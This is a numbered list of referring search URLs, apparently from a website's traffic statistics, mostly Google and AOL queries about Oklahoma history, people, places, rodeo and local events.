1144http://www.googlesyndicatedsearch.com/u/moodle?q=Bert+Seabourn+Painting+Chero...1
1145http://www.googlesyndicatedsearch.com/u/ell?q=Pistol+Pete&sa=Google+Search!&d...1
1146http://www.googlesyndicatedsearch.com/u/ell?q=butterflies+and+grazing+&hl=en&...1
1147http://www.googlesyndicatedsearch.com/u/ell?q=list+1978+graduates&hl=en&safe=...1
1148http://www.googlesyndicatedsearch.com/u/ell?q=list+1978+graduates&domains=lib...1
1149http://www.okcimc.com/titles/tourism/kiamichi.htm1
1150http://www.googlesyndicatedsearch.com/u/okstate?hl=en&domains=okstate.edu&sit...1
1151http://64.233.169.104/search?q=cache:SndEkRgn070J:digital.library.okstate.edu...1
1152http://www.googlesyndicatedsearch.com/u/okstate?hl=en&domains=okstate.edu&ie=...1
1153http://www.muskogeephoenix.com/homepage/local_story_107230113.html?start:int=...1
1154http://www.googlesyndicatedsearch.com/u/okstate?domains=okstate.edu&q=career+...1
1155http://www.googlesyndicatedsearch.com/u/okstate?domains=okstate.edu&q=gift+sh...1
1156http://www.googlesyndicatedsearch.com/u/okstate?hl=en&domains=okstate.edu&ie=...1
1157http://www.googlesyndicatedsearch.com/u/okstate?domains=okstate.edu&q=photogr...1
1158http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GWYE_enUS258U...1
1159http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_en___US2...1
1160http://aim.search.aol.com/search/search?invocationType=tbff50trie7&query=cave...1
1161http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_en___AE2...1
1162http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T5GGLL_en___US2...1
1163http://www.google.com/search?um=1&hl=en&q=+where+is+the+uss+oklahoma+today&ie...1
1164http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS254U...1
1165http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS256U...1
1166http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS267U...1
1167http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS262U...1
1168http://aim.search.aol.com/search/search?invocationType=topsearchbox.search&qu...1
1169http://www.google.de/search?client=firefox-a&rls=org.mozilla%3Ade%3Aofficial&...1
1170http://www.google.de/search?client=firefox-a&rls=org.mozilla%3Ade%3Aofficial&...1
1171http://www.google.cz/search?q=Kym+Wilson&hl=cs&lr=&start=190&sa=N1
1172http://www.google.de/search?hl=de&client=firefox-a&rls=org.mozilla%3Ade%3Aoff...1
1173http://www.google.com/search?um=1&hl=en&safe=active&q=Jerry+Hagee&ie=UTF-8&sa...1
1174http://www.google.com/univ/okstate?hl=en&ie=UTF-8&sa=X&oi=spell&resnum=0&ct=r...1
1175http://www.google.com/xhtml/search?safe=active&client=search-cingular_mb_xhtm...1
1176http://www.google.com/webhp?hl=en&tab=nw1
1177http://www.google.de/search?hl=de&q=Geronimo+in+Lowton+Oklahoma&meta=1
1178http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4RNWN_enUS265&...1
1179http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS219U...1
1180http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4RNWN_enUS220U...1
1181http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS229U...1
1182http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS241U...1
1183http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GWYE_en___US2...1
1184http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4GZHY_enUS239U...1
1185http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4HPIC_en___US2...1
1186http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4HPIB_en___US2...1
1187http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4TSHB_enUS211U...1
1188http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_en___US2...1
1189http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_en___US2...1
1190http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_en___AN2...1
1191http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_en___US2...1
1192http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS250U...1
1193http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS255U...1
1194http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS266U...1
1195http://www.google.com/search?sourceid=navclient&ie=UTF-8&rlz=1T4SUNA_enUS259U...1
1196http://www.google.ie/search?hl=en&q=din+osaurs++games&btnG=Google+Search&meta...1
1197http://www.google.fr/search?hl=fr&rlz=1T4RNWN_frFR253FR253&sa=X&oi=spell&resn...1
1198http://www.google.fr/search?hl=fr&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=A.+...1
1199http://aim.search.aol.com/search/search?&query=jobs%20in%20oklahoma%20cily&in...1
1200http://www.google.fr/search?hl=fr&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=hor...1
1201http://www.google.fr/search?q=137th+Fighter+Bomber+Wing++&hl=fr&start=20&sa=N...1
1202http://www.google.fr/custom?hl=fr&client=pub-1738174330838188&channel=7571977...1
1203http://www.google.fr/search?client=firefox-a&rls=org.mozilla%3Afr%3Aofficial&...1
1204http://www.google.fr/search?hl=fr&q=lord+iwant++chant++chorale&btnG=Recherche...1
1205http://www.google.fr/search?hl=en&q=real+outdoors+volume+36+no+3&btnG=Search1
1206http://www.google.fi/search?hl=fi&q=fashion%2B1968%2Bpictures%2Bwinter&meta=1
1207http://www.google.hu/search?hl=hu&sa=X&oi=spell&resnum=1&ct=result&cd=1&q=Lif...1
1208http://www.google.hu/search?q=electrik+light+orchestra+roll+ower&hl=hu&rlz=1T...1
1209http://www.google.hr/search?hl=hr&q=cimar+ole+factory+models&btnG=Tra%C5%BEi&...1
1210http://www.google.ie/hws/search?q=springan+england&client=dell-row&channel=ie...1
1211http://www.google.fr/search?q=Oklahoma+Today+Rattlesnake+Hunt&ndsp=21&um=1&hl...1
1212http://www.google.fr/search?q=king+karl++where+are+the+great+men+ile+de+la+re...1
1213http://www.google.gr/search?hl=el&q=amateur+bick+dik&btnG=%CE%91%CE%BD%CE%B1%...1
1214http://www.google.fr/search?q=nasl+indoor+coaching&hl=fr&start=60&sa=N1
1215http://www.google.de/search?hl=de&q=Winter+1976-1977&btnG=Google-Suche&meta=1
1216http://www.google.de/search?q=Brummett-Echohawk&hl=de&start=10&sa=N1
1217http://www.google.de/search?q=Brummett-Echohawk&hl=de&start=30&sa=N1
1218http://www.google.de/search?num=100&hl=de&sa=X&oi=spell&resnum=0&ct=result&cd...1
1219http://www.google.de/search?q=Cowboy+geschichte&hl=ru&rlz=1T4SKPB_ruDE260DE26...1
1220http://www.google.de/search?q=jimmy+reece&hl=de&start=150&sa=N1
1221http://www.google.de/search?hl=de&q=ashby%27s+antiques+dallas&btnG=Google-Suc...1
1222http://www.google.de/search?hl=de&q=develwing&meta=1
1223http://www.google.de/search?hl=de&q=old+Santa+Fe+station+bartlesville&meta=1
1224http://www.google.de/search?hl=de&q=norman+living+magazine+oklahoma+circulati...1
1225http://www.google.es/search?hl=es&rlz=1T4SHCN_enES255ES255&q=monas+wahoma&met...1
1226http://www.google.es/search?hl=ca&q=beaclers+dogs&meta=1
1227http://www.google.es/search?hl=de&q=%22Kymberlee+Wilson%22+%2B+tulsa1
1228http://www.google.es/custom?q=emterprise+journaly&sa=B%C3%BAsqueda+de+Google&...1
1229http://www.google.es/search?hl=es&q=15th+wood+carving+fakes&btnG=Buscar&meta=...1
1230http://www.google.de/search?q=siegfried+line++pillbox+construction*+plan*&hl=...1
1231http://www.google.dk/search?hl=da&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=hec...1
1232http://www.google.dk/search?sourceid=navclient&hl=da&ie=UTF-8&rlz=1T4ADBF_daD...1
1233http://www.google.dk/search?q=%22hot+air+turbine%22+sun&hl=da&lr=lang_en&as_q...1
1234http://www.google.com/search?q=article+abaut+pressur+air+in+mine+paper+pdf&hl...1
1235http://www.google.com/search?q=grant+high+school+class+1979+year+book+oklahom...1
1236http://www.google.com/search?q=greenleaf+1949+oklahoma+park&rls=com.microsoft...1
1237http://www.google.com/search?q=gold+at+devil%27s+canyon+oklahoma&hl=en&newwin...1
1238http://www.google.com/search?q=greenleaf+state+park+1942&hl=en&rls=com.micros...1
1239http://www.google.com/search?q=gurley+swimming+pool+in+north+platte,+ne&hl=en...1
1240http://www.google.com/search?q=gerald+r+ford+pure+gold+1974++big+as+a+50+cent...1
1241http://www.google.com/search?q=ghost++%22barbara+palmer%22&hl=en&lr=lang_en&a...1
1242http://www.google.com/search?q=glee+dale&hl=en&start=10&sa=N1
1243http://www.google.com/search?q=glass+caskets+ada+oklahoma&hl=en&rls=com.micro...1
1244http://www.google.com/search?q=george+romick,+oklahoma&hl=en&start=10&sa=N1
1245http://www.google.com/search?q=hidden+springs+ranch+in+velma+oklahoma&rls=com...1
1246http://aolsearch.aol.com/aol/search?invocationType=searchbox.webhome&query=wa...1
1247http://www.google.com/search?q=henryetta+tornadoes+&hl=en&start=10&sa=N1
1248http://www.google.com/search?q=history+of+lead+and+zink+mines+around+joplin+m...1
1249http://www.google.com/search?q=guy+fraser+harrison+award&hl=en&start=10&sa=N1
1250http://www.google.com/search?q=haney+1981+painting&hl=en&start=10&sa=N1
1251http://www.google.com/search?q=haymaker+ranch,+yukon,+ok&hl=en&client=firefox...1
1252http://www.google.com/search?q=harry+vold+bucking+horses&hl=en&start=120&sa=N...1
1253http://www.google.com/search?q=hockey+applique+quilt+patterns&hl=en&rls=com.m...1
1254http://www.google.com/search?q=fort+gibson+Oklahoma+girls+team+picture+basket...1
1255http://www.google.com/search?q=frank+phillips+shares+meal+with+billy+the+kid&...1
1256http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1257http://www.google.com/search?q=frederick+oklahoma+centennial+parade&hl=en&sta...1
1258http://www.google.com/search?q=frenchmen%27s+gold&hl=en&rlz=1T4GZAY_enUS237US...1
1259http://www.google.com/search?q=events+in+spring+1967&hl=en&start=20&sa=N1
1260http://www.google.com/search?q=exhausted+roosters&hl=en&start=20&sa=N1
1261http://www.google.com/search?q=first+rolling+shopping+cart+Ardmore+Oklahoma&h...1
1262http://www.google.com/search?q=falls+Creek+Baptist+Assembly+1970&hl=en1
1263http://www.google.com/search?q=georege+rouse+pleasant+valley+ok&rls=com.micro...1
1264http://www.google.com/search?q=gene+bavinger&hl=en&start=10&sa=N1
1265http://www.google.com/search?q=gene+mooney+and+the+westerners&hl=en&start=140...1
1266http://www.google.com/search?q=gazebo+wedding+northeast+oklahoma&hl=en&rls=co...1
1267http://www.google.com/search?q=genealogy+dessauer+oklahoma+city&hl=en1
1268http://www.google.com/search?q=frenchmen%27s+gold&hl=en&rlz=1T4GZAY_enUS237US...1
1269http://www.google.com/search?q=fryin+pan+ranch++,+ponca+Oklahoma&hl=en&rls=co...1
1270http://www.google.com/search?q=gaz+of+old+coin+in+sid+the+erthe&hl=fa&lr=&sta...1
1271http://www.google.com/search?q=gary+Lantz&hl=en&start=50&sa=N1
1272http://www.google.com/search?q=events+in+spring+1967&hl=en1
1273http://www.google.com/search?q=kenton%2C+oklahoma+sunrise+easter+services&rls...1
1274http://www.google.com/search?q=kevin+ellis+bullfighter&hl=en&rlz=1T4DKUS_enUS...1
1275http://www.google.com/search?q=ken+reid+weatherford&ie=utf-8&oe=utf-8&aq=t&rl...1
1276http://www.google.com/search?q=kiowa+veteran&hl=en&start=50&sa=N1
1277http://www.google.com/search?q=klinger+plane+crash+oklahoma&rls=com.microsoft...1
1278http://www.google.com/search?q=jones+goad+cherokee+blood&hl=en&start=40&sa=N1
1279http://www.google.com/search?q=june+1956&hl=en&client=safari&rls=en&start=40&...1
1280http://www.google.com/search?q=junetta+davis&rls=com.microsoft:en-us:IE-Searc...1
1281http://www.google.com/search?q=junetta+davis&ie=utf-8&oe=utf-8&aq=t&rls=org.m...1
1282http://www.google.com/search?q=john+kings+and+spindletop+oil+rites&hl=en&star...1
1283http://www.google.com/search?q=leon+unger&hl=en&rls=GGLG,GGLG:2006-09,GGLG:en...1
1284http://www.google.com/search?q=locations+to+sell+costume+jewelry+at+venues+in...1
1285http://aolsearch.aol.com/aol/search?encquery=e7e145484901fac6d26d7668cc0f0893...1
1286http://www.google.com/search?q=louisa+mccune+%2B+oklahoma+&hl=en1
1287http://www.google.com/search?q=kremer+lehigh+1933&hl=en&start=80&sa=N1
1288http://www.google.com/search?q=laverne+oklahoma+power+plant&hl=en&safe=strict...1
1289http://aolsearch.aol.com/aol/search?encquery=fedd8f6f8d62d5d6f5174e90113b86fb...1
1290http://www.google.com/search?q=lenny+skye%2Cbaxter+springs&ie=utf-8&oe=utf-8&...1
1291http://www.google.com/search?q=hogshooter+family+oklahoma&hl=en&start=10&sa=N...1
1292http://www.google.com/search?q=ike+rude&gbv=2&hl=en&safe=off&ndsp=20&ie=UTF-8...1
1293http://www.google.com/search?q=illustrator+Paul+Laune&hl=en&ie=UTF-8&start=10...1
1294http://www.google.com/search?q=huckins+hotel&hl=en&start=50&sa=N1
1295http://www.google.com/search?q=indian+photos+by+hedrick+in+oklahoma&gbv=2&hl=...1
1296http://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query=kio...1
1297http://www.google.com/search?q=housing+additions+lake+tenkiller+ok&hl=en&star...1
1298http://www.google.com/search?q=houston+museum+of+natural+science/+tipi+and+bu...1
1299http://www.google.com/search?q=how+many+miles+is+nacogdoches+from+okla+city&h...1
1300http://aolsearch.aol.com/aol/search?invocationType=client_searchbox&query=top...1
1301http://www.google.com/search?q=john+hartman+tulsa+photos&hl=en&start=20&sa=N1
1302http://www.google.com/search?q=jill+cronley&hl=en&ie=UTF-8&start=10&sa=N1
1303http://aolsearch.aol.com/aol/search?invocationType=chstrip&query=can+geodes+b...1
1304http://www.google.com/search?q=jd+mcguire+mineral+rights+ok+city&rls=com.micr...1
1305http://www.google.com/search?q=joan+frederick&hl=en&start=10&sa=N1
1306http://www.google.com/search?q=irene+jasinski+us+army&hl=en&rls=com.microsoft...1
1307http://www.google.com/search?q=iud+for+dogs&hl=en&client=firefox-a&rls=org.mo...1
1308http://www.google.com/search?q=jaycees+established+small+airports+%22JC%22+ro...1
1309http://www.google.com/search?q=jatrnice1
1310http://www.google.com/search?q=mac+mcgalliard&sourceid=ie7&rls=com.microsoft:...1
1311http://www.google.com/search?q=bucking+bulls+tonardo&hl=en&start=30&sa=N1
1312http://www.google.com/search?q=bud+wilkinson+site:.edu&hl=en&lr=&as_qdr=all&s...1
1313http://www.google.com/search?q=buck+rutherford&hl=en&rlz=1T4DMUS_enUS233US238...1
1314http://www.google.com/search?q=bulk+waterski+rope+&hl=en&rls=com.microsoft:en...1
1315http://www.google.com/search?q=bunny%27s+fried+onion+burgers+oklahoma+city&hl...1
1316http://www.google.com/search?q=brick+Oklahoma+throwing&hl=en&rls=com.microsof...1
1317http://www.google.com/search?q=brickmakers+in+oklahoma+territory&hl=en&rls=co...1
1318http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1319http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1320http://www.google.com/search?q=bob+hinton+prints+++the+owl&hl=en&rls=com.micr...1
1321http://www.google.com/search?q=carmelite+sisters+puff+pastries&hl=en&rlz=1T4R...1
1322http://www.google.com/search?q=cheeseburgers+oklahoma+ballard%27s&hl=en&rls=c...1
1323http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1324http://www.google.com/search?q=cherekee+indians+around+cash+%2cokiahoma1
1325http://www.google.com/search?q=bybute&sourceid=navclient-ff&ie=UTF-8&rlz=1B3G...1
1326http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1327http://www.google.com/search?q=calvin+berry&hl=en&client=firefox-a&rls=org.mo...1
1328http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1329http://www.google.com/search?q=chiricahua+apache+moc.&hl=en&safe=off&start=90...1
1330http://www.google.com/search?q=belo+cozad&ie=utf-8&oe=utf-8&aq=t&rls=org.mozi...1
1331http://www.google.com/search?q=ben+johnson+celebrity+team+roping&hl=en&client...1
1332http://www.google.com/search?q=beautiful+girls+hn+USA&hl=fa&lr=&start=60&sa=N...1
1333http://www.google.com/search?q=beutler+and+sons+&hl=en&safe=active&rls=WZPA,W...1
1334http://www.google.com/search?q=big+breasted+dollmakers&safe=active1
1335http://www.google.com/search?q=athlete+of+czech+descent&hl=en&rlz=1G1GGLQ_ENU...1
1336http://www.google.com/search?q=back+to+nature+cottonseed+hulls+tulsa+ok&hl=en...1
1337http://www.google.com/search?q=banner+stones&hl=en&rls=DELA,DELA:2005-51,DELA...1
1338http://www.google.com/search?q=back+to+trailen+menu++game+for+you&btnG=Search...1
1339http://www.google.com/search?q=bob+herndon+oklahoma+football&hl=en&start=10&s...1
1340http://www.google.com/search?q=bob+burris+-+oklahoma+university+football+play...1
1341http://www.google.com/search?q=bob+crosby+rodeo+rider&hl=en&rls=GGLG,GGLG:200...1
1342http://www.google.com/search?q=blue+jay+corn+plaster+on+aching+corns&hl=en&st...1
1343http://www.google.com/search?q=bob+gaskins+Silver+ghost&rls=com.microsoft:en-...1
1344http://www.google.com/search?q=bioscope+manufacturing+company+tulsa%2C+Oklaho...1
1345http://www.google.com/search?q=blackledge+tribe&hl=en&start=20&sa=N1
1346http://www.google.com/search?q=blue+bell+saloon+guthrie+oklahoma&hl=en&safe=o...1
1347http://www.google.com/search?q=blue+bell+saloon+guthrie+oklahoma&hl=en&safe=o...1
1348http://www.google.com/search?q=event+in+1967+in+oklahoma&hl=en&start=50&sa=N1
1349http://www.google.com/search?q=discover+0klahoma&sourceid=ie7&rls=com.microso...1
1350http://www.google.com/search?q=driving+directions+camp+takatoka&hl=en&rlz=1G1...1
1351http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1352http://www.google.com/search?q=eagle+park+old+west+ghost+town,+cache,+oklahom...1
1353http://www.google.com/search?q=earl+halliburton+heir+to+the+halliburton+fortu...1
1354http://www.google.com/search?q=dierks+boy+scout+camp+oklahoma&hl=en&start=10&...1
1355http://www.google.com/search?q=diesel+sleeve-valve+engines&hl=en&start=90&sa=...1
1356http://www.google.com/search?q=digital+library+oklahoma+devils+canyon&hl=en1
1357http://www.google.com/search?q=digging+semi-precious+stones+in+Oklahoma&hl=en...1
1358http://www.google.com/search?q=dick+delgado&hl=en&rls=com.microsoft:en-us&sta...1
1359http://www.google.com/search?q=enid+reaves+hall&hl=en&rls=RNWI,RNWI:2007-37,R...1
1360http://www.google.com/search?q=enterprise+square+usa&hl=en&start=40&sa=N1
1361http://www.google.com/search?q=empezada+bread&hl=en&sourceid=gd&rls=DNUS,DNUS...1
1362http://www.google.com/search?q=eufaula+dam&hl=en&start=10&sa=N1
1363http://www.google.com/search?q=easter+service+in+Oklahoma&hl=en&start=60&sa=N...1
1364http://www.google.com/search?q=edwin+booth+floodgate+ken+risch1
1365http://www.google.com/search?q=emily+jerman&hl=en&safe=off&client=firefox-a&c...1
1366http://www.google.com/search?q=emily+jerman&hl=en&safe=off&client=firefox-a&c...1
1367http://aolsearch.aol.com/aol/search?invocationType=topsearchbox.search&query=...1
1368http://www.google.com/search?q=coming+though+the+rye+sculpture+cowboy+hall+of...1
1369http://www.google.com/search?q=coming+though+the+rye+sculpture+cowboy+hall+of...1
1370http://www.google.com/search?q=cold+creek+anglers+spavinaw+creek&hl=en&rlz=1T...1
1371http://www.google.com/search?q=conrad+schwiering++for+sale&hl=en&start=50&sa=...1
1372http://www.google.com/search?q=counterfit+gas+station+arcadia+Oklahoma&rls=co...1
1373http://www.google.com/search?q=christina+pickard&hl=en&start=10&sa=N1
1374http://www.google.com/search?q=cindy+killion&hl=en&client=firefox-a&rls=org.m...1
1375http://www.google.com/search?q=clothespin+basket&hl=en&client=firefox-a&rls=o...1
1376http://www.google.com/search?q=citv+captain+mac&ndsp=20&hl=en&rls=com.microso...1
1377http://www.google.com/search?q=dancing+rabbit+beaver%27s+bend&hl=en&rlz=1T4SU...1
1378http://www.google.com/search?q=current+peyote+ceremonies+in+Oklahoma&hl=en&st...1
1379http://www.google.com/search?q=cushing+oklahoma+baseball&hl=en&rlz=1T4DKUS_en...1
1380http://www.google.com/search?q=crystal+cave,davis+ok&hl=en&rls=com.microsoft:...1
1381http://www.google.com/search?q=cut+ribbonwork+in+the+diamond+pattern&hl=en&st...1
1382http://www.google.com/search?q=country+charm+bed+and+breakfast+Lone+Wolf,+OK&...1
1383http://www.google.com/search?q=cowboy+skeletons+and+horses+pulling+hearse+pic...1
1384http://www.google.com/search?q=crossing+the+red+river+sculpture+oklahoma&ie=u...1
1385http://www.google.com/search?q=craft+and+bazaar+shows+in+tulsa+area,+march,ap...1
1386http://www.google.com/search?q=used+cheap+concession+stand+rent+to+own+in+okl...1
1387http://www.google.com/search?q=role+of+MIScross+cultural+communication+&Overv...1
1388http://www.google.com/search?q=ron+acree+claremore&rls=com.microsoft:en-us&ie...1
1389http://www.google.com/search?q=rodeo+cowboy+todd+whatley&hl=en&rls=GFRC,GFRC:...1
1390http://www.google.com/search?q=rose+stones&hl=en&rlz=1T4GFRD_en___US204&start...1
1391http://www.google.com/search?q=sac+and+fox+native+american+ribbon+skirts&sour...1
1392http://www.google.com/search?q=retro+checkerboard+cafe+menus&hl=en&sourceid=g...1
1393http://www.google.com/search?q=ride+cowboy+poetry+%22over+the+great+divide%22...1
1394http://www.google.com/search?q=robing+peter+to+pay+paul+quilt+pattern&hl=en&s...1
1395http://www.google.com/search?q=riverside+indians+seniors+graduation+pictures+...1
1396http://www.google.com/search?q=redstone+church+anadarko&hl=en&client=safari&r...1
1397http://aolsearch.aol.com/aol/search?encquery=8929abdb44fe882bc6827774901460e7...1
1398http://www.google.com/search?q=schwiering+painting+for+sale&hl=en&start=30&sa...1
1399http://www.google.com/search?q=sauare++dance+okla&ie=utf-8&oe=utf-8&aq=t&rls=...1
1400http://www.google.com/search?q=scott+carlberg&hl=en&start=30&sa=N1
1401http://www.google.com/search?q=saddle+blanket+used+on+gene+autry+horse+champi...1
1402http://www.google.com/search?q=sand+springs+ok++sculpture+brick&btnmeta%3Dsea...1
1403http://www.google.com/search?q=sapulpa+high+school+1967&hl=en&rlz=1T4ADBF_enU...1
1404http://www.google.com/search?q=santa+fe+sunset+photo+tips&hl=en&rlz=1G1GGLQ_E...1
1405http://www.google.com/search?q=scottish+rite+tulsa+oklahoma+red+fork+lodge&hl...1
1406http://www.google.com/search?q=pics+of+cows&oi=navquery_searchbox&sa=X&as_sit...1
1407http://www.google.com/search?q=pictures+of+Spiro+Mounds,+Oklahoma&hl=en&clien...1
1408http://www.google.com/search?q=pics+fred+drummond+home+oklahoma&rls=com.micro...1
1409http://www.google.com/search?q=pictures+of+pontotoc+warriors+marching+band&co...1
1410http://aolsearch.aol.com/aol/search?encquery=a4cd82864ccbb6ee&invocationType=...1
1411http://aolsearch.aol.com/aol/search?encquery=aaee7469ae08ad86efe9822156cdbb78...1
1412http://aolsearch.aol.com/aol/search?encquery=a8ecfdf31bb1a91ff52e2019dec98aa6...1
1413http://www.google.com/search?q=photography+guide%2C+sunset&rls=com.microsoft:...1
1414http://www.google.com/search?q=photo+of+anne+dean+truitt+sculpture&hl=en&clie...1
1415http://www.google.com/search?q=rear+admiral+pierre+n.+charbonnet&hl=en&start=...1
1416http://www.google.com/search?q=rams+voliume+%22semen%22+-ewe+filetype:pdf&hl=...1
1417http://www.google.com/search?q=rare+national+finals+rodeo+belt+buckles+for+sa...1
1418http://www.google.com/search?q=raised+vegetable+garden+using+cottonseed+hulls...1
1419http://www.google.com/search?q=rear+admiral+pierre+n.+charbonnet&gbv=2&hl=en&...1
1420http://www.google.com/search?q=plan+on+lin+gams&hl=en&start=20&sa=N1
1421http://www.google.com/search?q=ponca+city+oklahoma+high+school+1980&hl=en&sta...1
1422http://www.google.com/search?q=quanah+parker+lake+dam+was+erected&hl=en&rls=c...1
1423http://www.google.com/search?q=preparing+buck+brush+for+weaving+baskets&hl=en...1
1424http://www.google.com/search?q=phleat+boyd&hl=en&rls=com.microsoft:en-US&star...1
1425http://www.google.com/search?q=treasure+hunting+sites+in+oklahoma&hl=en&rlz=1...1
1426http://aolsearch.aol.com/aol/search?encquery=88acb43ebf3da3b3338af30cc2e1d125...1
1427http://www.google.com/search?q=tornado+shattuck+oklahoma&hl=en&rls=com.micros...1
1428http://www.google.com/search?q=tulsa+powwow+princess&hl=en&start=40&sa=N1
1429http://www.google.com/search?q=turkey+beard+roach&hl=en&start=20&sa=N1
1430http://www.google.com/search?q=ti,+oklahoma,+ghosttown&hl=en&start=10&sa=N1
1431http://www.google.com/search?q=time+capsule+western+st+ate+hospital+1958&btnG...1
1432http://www.google.com/search?q=today+in+19671
1433http://www.google.com/search?q=today+in+1958&sourceid=navclient-ff&ie=UTF-8&r...1
1434http://www.google.com/search?q=three+buoys+houseboat+52%27&hl=en&start=50&sa=...1
1435http://www.google.com/search?q=unfound+treasure+in+South+Dakota&hl=en&start=4...1
1436http://www.google.com/search?q=urban+FFA&hl=en&start=10&sa=N1
1437http://www.google.com/search?q=ue++++++++us+cavalry+portable+forge+++++++++++...1
1438http://www.google.com/search?q=usao+class+of+1983&hl=en&start=60&sa=N1
1439http://www.google.com/search?q=turkey+beard+roaches&hl=en&start=30&sa=N1
1440http://aolsearch.aol.com/aol/search?encquery=6185a19ec95cd223480a3827427c0bfc...1
1441http://www.google.com/search?q=twin+chimney+kiamichi+river+crossing&hl=en&cli...1
1442http://www.google.com/search?q=tw%26s++furniture+company&ie=utf-8&oe=utf-8&aq...1
1443http://www.google.com/search?q=scrapbooking+retreats+for+national+scrapbook+d...1
1444http://www.google.com/search?q=site%3A+oklahomatoday.com++Kimberly+Ryan&sourc...1
1445http://www.google.com/search?q=sky+is+the+limit+ranch+ardmore+oklahoma+&ndsp=...1
1446http://www.google.com/search?q=silver+dollar+saloon+duncan+OK&hl=en&start=40&...1
1447http://www.google.com/search?q=sparlin+photos&hl=en&client=firefox-a&rls=org....1
1448http://www.google.com/search?q=spring+branding&sourceid=navclient-ff&ie=UTF-8...1
1449http://www.google.com/search?q=semarone&hl=en&start=10&sa=N1
1450http://www.google.com/search?q=seminole+field+oil+photo&hl=en&safe=active&sta...1
1451http://www.google.com/search?q=shockley%2C+cherokee%2C+oklahoma&rls=com.micro...1
1452http://www.google.com/search?q=sequoyah+county+oklahoma+stagecoach+robberies&...1
1453http://www.google.com/search?q=the+robber+bridegroom+recordi+ng&hl=en&rls=com...1
1454http://www.google.com/search?q=summer+1966+top+40&hl=en&start=20&sa=N1
1455http://www.google.com/search?q=tauno+ekonen&hl=en&c2coff=11
1456http://www.google.com/search?q=sucker+rods%2C++for+sale+around+guymon+%2COK&b...1
1457http://www.google.com/search?q=the+building+of+oologah+dam&hl=en&start=10&sa=...1
1458http://www.google.com/search?q=springlake+okc+roller+coaster&hl=en&client=saf...1
1459http://www.google.com/search?q=stagecoach+route+Pensacola+to+New+Orleans&hl=e...1
1460http://www.google.com/search?q=sucker+day+in+wetumka,+ok&hl=en&start=40&sa=N1
1461http://www.google.com/search?q=strange+lights+in+fort+supply,+oklahoma&hl=en&...1
1462http://www.google.com/search?q=mamie+johnson+1975+murder&hl=en&rlz=1T4HPIA_en...1
1463http://www.google.com/search?q=ned+hockman&hl=en&start=10&sa=N1
1464http://www.google.com/search?q=new+years+eve+1979-1980&hl=en&rlz=1T4RNWI_enUS...1
1465http://www.google.com/search?q=natural+rocks+in+southeast+oklahoma&rls=com.mi...1
1466http://www.google.com/search?q=norman+b+wiltsey&hl=en&rlz=1T4GFRD_enUS217US21...1
1467http://www.google.com/search?q=norman+b+wiltsey,+author&hl=en&rlz=1T4GFRD_enU...1
1468http://www.google.com/search?q=musical+oklahoma+smokehouse+stage+photos&hl=en...1
1469http://www.google.com/search?q=muskogee+central+high+school+class+of+1961&hl=...1
1470http://www.google.com/search?q=myron+roderick&hl=en&start=20&sa=N1
1471http://www.google.com/search?q=muskogee,ok+stores+in+1978&hl=en&rlz=1T4GZAZ_e...1
1472http://www.google.com/search?q=most+influential+oklahomans&hl=en&rlz=1T4SUNA_...1
1473http://aolsearch.aol.com/aol/search?encquery=e392b737c0b6ad2a945e1bfd71fd2fe1...1
1474http://www.google.com/search?q=oklahoma+%22hanging+judge+parker%22&hl=en&lr=&...1
1475http://www.google.com/search?q=okla+blue+bell+factory1
1476http://www.google.com/search?q=oklahoma+%22joe+c.+scott%22&hl=en&lr=&as_qdr=a...1
1477http://www.google.com/search?q=norman+rockwell+carefree+autumn&rls=com.micros...1
1478http://www.google.com/search?q=nostalgic+autumn+by+eric+sloane&hl=en&safe=off...1
1479http://www.google.com/search?q=okees+that+was+from+the+great+depression&hl=en...1
1480http://www.google.com/search?q=o+w+coburn+muskogee&hl=en&rlz=1T4SUNA_enUS256U...1
1481http://www.google.com/search?q=oklahoma+alabaster+stone&hl=en&start=10&sa=N1
1482http://www.google.com/search?q=marvin+holmes%2Bsaddle+bronc+rider%2Brodeo&hl=...1
1483http://www.google.com/search?q=marvin+tong&hl=en&client=firefox-a&rls=org.moz...1
1484http://www.google.com/search?q=marvanette+Sowel+new+mexico&rls=com.microsoft:...1
